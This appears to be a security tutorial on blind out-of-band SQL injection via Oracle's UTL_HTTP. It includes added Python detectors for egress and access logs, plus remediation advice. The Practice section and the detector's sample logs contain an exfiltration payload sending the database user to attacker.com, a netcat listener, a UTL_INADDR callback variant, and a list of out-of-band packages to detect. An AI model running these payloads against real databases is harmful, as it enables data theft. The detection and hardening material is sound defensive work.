UTL_HTTP

Context

In this article, we explore how to exploit Oracle's UTL_HTTP package for blind out-of-band SQL injection attacks. Familiarity with HTTP requests, database functions, and Oracle SQL injection is assumed. The goal is to exfiltrate data from an Oracle database by leveraging the UTL_HTTP package, which allows database interactions with external web services. This type of injection is particularly useful when direct database responses to injected queries are not accessible.

Theory

UTL_HTTP Functionality in Oracle

UTL_HTTP is a PL/SQL package within Oracle databases that enables the execution of HTTP requests. This package is intended to facilitate communication between the database and external web services, allowing the database to send HTTP requests to specified URLs. While designed for legitimate purposes, UTL_HTTP can be exploited for malicious data exfiltration in the context of SQL injection attacks.

The risk arises when an injectable query runs as a database user that can call UTL_HTTP: the payload can embed the result of a subquery in the URL of an HTTP request that the database itself sends to an attacker-controlled server, so sensitive data leaves the database without ever appearing in the application's response.

Blind Out-of-Band SQL Injection

Blind out-of-band SQL injection is a technique used when direct feedback from injected queries is not possible. By leveraging side channels, attackers can extract data indirectly. The process involves crafting payloads that initiate actions outside the database, such as HTTP requests to an external server controlled by the attacker.

An essential requirement for this attack is that the vulnerable Oracle database can reach external servers and that the injected statement runs with EXECUTE privilege on UTL_HTTP (historically granted to PUBLIC). Since Oracle 11g the call additionally requires a network ACL that grants the user access to the destination host; without one it fails with ORA-24247 and no request leaves the database. By injecting payloads that place sensitive database information in HTTP query parameters or paths, an attacker can extract data without receiving direct database responses.
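Because the channel is an ordinary outbound HTTP request from the database host, it is also observable on the network side no matter how the payload itself is written. The following is an added example, not code from the original article: it flags outbound HTTP from the database server to any host outside an egress allowlist in a constructed, Squid-style egress log. The addresses, the allowlist and the log lines are all assumptions for the demonstration. Note that UTL_HTTP connects directly unless a proxy has been configured with UTL_HTTP.SET_PROXY, so in practice the log would come from an egress firewall or a transparent proxy rather than an explicit proxy setting.

```python
"""Flag outbound HTTP from a database host to destinations outside its egress allowlist.

Added example, not code from the original article. The database host
address, the allowlist and the Squid-style log lines are constructed.
"""
from urllib.parse import unquote, urlsplit

# Hosts the database server is legitimately allowed to call (constructed).
EGRESS_ALLOWLIST = {"payments.internal.example", "geocode.internal.example"}
# Addresses of the database servers being watched (constructed).
DB_SERVER_IPS = {"10.0.0.20"}

# Squid native log: timestamp elapsed client code/status bytes method url user hierarchy type
# Constructed sample: one allowed call, one call carrying a database user name
# in the path to an unknown host, and one request from a non-database host.
SAMPLE_EGRESS_LOG = [
    "1710238442.101   120 10.0.0.20 TCP_MISS/200 812 GET http://payments.internal.example/rates - HIER_DIRECT/10.0.5.9 application/json",
    "1710238449.338    95 10.0.0.20 TCP_MISS/404 0 GET http://attacker.com/APP_USER - HIER_DIRECT/203.0.113.10 text/html",
    "1710238470.902    88 10.0.0.31 TCP_MISS/200 340 GET http://www.example.com/ - HIER_DIRECT/93.184.216.34 text/html",
]


def parse_egress_line(line):
    """Split one Squid-style line into the fields the check needs, or None if malformed."""
    fields = line.split()
    if len(fields) < 7:
        return None
    return {"ts": float(fields[0]), "client": fields[2], "status": fields[3], "url": fields[6]}


def suspicious_egress(lines):
    """Return one finding per request a database host made to a non-allowlisted destination.

    The finding keeps the decoded path and query as evidence, because that is
    where an out-of-band payload carries the exfiltrated value.
    """
    findings = []
    for line in lines:
        rec = parse_egress_line(line)
        if rec is None or rec["client"] not in DB_SERVER_IPS:
            continue
        parts = urlsplit(rec["url"])
        if parts.hostname in EGRESS_ALLOWLIST:
            continue
        leaked = unquote(parts.path.lstrip("/"))
        if parts.query:
            leaked += "?" + unquote(parts.query)
        findings.append({"ts": rec["ts"], "host": parts.hostname, "leaked": leaked, "status": rec["status"]})
    return findings


if __name__ == "__main__":
    for f in suspicious_egress(SAMPLE_EGRESS_LOG):
        print(f"{f['ts']:.0f} db host -> {f['host']} carrying {f['leaked']!r} (upstream {f['status']})")
```

The response status from the attacker's server is irrelevant to the leak (the data is already in the request line when the 404 comes back), which is why the check keys on destination and client rather than on status. A database server that needs no outbound HTTP at all should have an empty allowlist, and the same finding should be raised for DNS lookups of unknown names, since UTL_INADDR offers an equivalent channel.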

Practice

Exploiting UTL_HTTP for Blind Out-of-Band SQL Injection

These steps guide you through exploiting UTL_HTTP to achieve data exfiltration when a direct response from the database is unavailable:

  • Identify a Vulnerable SQL Query: Begin by locating an injectable Oracle SQL query whose executing database user has EXECUTE on the UTL_HTTP package, so that injected statements can issue HTTP requests through UTL_HTTP.

  • Inject the Payload: Use the following command to craft and inject a SQL payload that retrieves sensitive data.

    SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual;

    This payload sends an HTTP request to http://attacker.com/, appending the result of (SELECT user FROM dual) to the URL. The query retrieves the current database user, leaking this information to the attacker's server.

  • Monitor Attack Server Logs: Set up an HTTP server on the attacker's side and monitor the access logs for incoming requests. This can be achieved using tools like Netcat or a simple web server setup.

    nc -lnvp 80

    As the injected SQL executes, the Oracle database sends HTTP requests to http://attacker.com/, which appear in the server logs.

  • Extract Data from Logs: Analyze the HTTP server logs to collect the leaked data. Each request may contain parts of the database information exfiltrated from the Oracle system.
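On the application side, the payload used in these steps can be caught before it reaches the database. The example below is added here and is not code from the original article: it scans constructed Apache-style access log lines for injected calls to Oracle packages that can open outbound connections (UTL_HTTP and a few related ones), decodes double-URL-encoded parameters, and reports the callback host named in the payload. The log format, the sample lines and the package list are assumptions for the demonstration.

```python
"""Detect Oracle out-of-band SQL injection payloads in web server access logs.

Added example, not code from the original article. The log format, the
sample lines and the package list are constructed for this demonstration.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Oracle packages and types that can open outbound network connections and
# therefore serve as out-of-band channels (UTL_HTTP is the one the article uses).
OOB_PACKAGES = ("UTL_HTTP", "UTL_INADDR", "HTTPURITYPE", "DBMS_LDAP", "UTL_TCP", "UTL_SMTP")
OOB_CALL = re.compile(r"\b(" + "|".join(OOB_PACKAGES) + r")\b", re.IGNORECASE)

# Best-effort extraction of the callback host: a URL scheme, or a quoted string
# literal (optionally starting with a dot), followed by a dotted host name.
CALLBACK_HOST = re.compile(r"""(?:https?://|['"]\.?)([A-Za-z0-9][A-Za-z0-9.-]*\.[A-Za-z0-9-]+)""")

# Apache/nginx combined-style prefix: client - - [timestamp] "METHOD target proto" status
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one benign request, one carrying the article's UTL_HTTP
# payload in the id parameter, and one double-URL-encoded UTL_INADDR variant.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:14:02 +0000] "GET /item?id=42 HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Mar/2024:10:14:09 +0000] "GET /item?id=42%27%7C%7C(SELECT%20UTL_HTTP.REQUEST'
    '(%27http%3A%2F%2Fattacker.com%2F%27%7C%7C(SELECT%20user%20FROM%20dual))%20FROM%20dual)--%20 HTTP/1.1" 500 0',
    '198.51.100.7 - - [12/Mar/2024:10:14:30 +0000] "GET /item?id=42%2527%257C%257CUTL_INADDR.GET_HOST_ADDRESS'
    '(%2527oob.attacker.example%2527) HTTP/1.1" 500 0',
]


def decode_repeatedly(value, rounds=3):
    """URL-decode up to `rounds` times so double-encoded payloads are revealed."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_line(line):
    """Return a finding dict if the log line carries an OOB payload, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    target = decode_repeatedly(m.group("target"))
    parts = urlsplit(target)
    # Inspect every parameter value and the path: the injection may sit in either.
    candidates = list(parse_qsl(parts.query, keep_blank_values=True))
    candidates.append(("<path>", parts.path))
    for location, value in candidates:
        pkg = OOB_CALL.search(value)
        if not pkg:
            continue
        host = CALLBACK_HOST.search(value[pkg.end():])
        return {
            "client": m.group("client"),
            "timestamp": m.group("ts"),
            "location": location,
            "package": pkg.group(1).upper(),
            "callback_host": host.group(1) if host else None,
            "status": int(m.group("status")),
        }
    return None


def scan(lines):
    """Run analyse_line over a whole log and return the findings in order."""
    return [f for f in map(analyse_line, lines) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_ACCESS_LOG):
        print(f"{f['timestamp']} {f['client']} {f['package']} in {f['location']} -> {f['callback_host']}")
```

Signature matching of this kind is a secondary control that obfuscated payloads can evade; the primary fix is to revoke EXECUTE on UTL_HTTP (and the related packages) from PUBLIC and to restrict the database's network ACLs so it can reach only the hosts it genuinely needs, which makes the request in the payload fail regardless of how it is encoded.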

Result

Executing the above steps allows an attacker to exfiltrate sensitive data from an Oracle database by leveraging the UTL_HTTP package in a blind out-of-band SQL injection attack. The data flows through HTTP requests to an attacker's server without requiring direct query results.

Tools

  • Burp Suite
  • Netcat
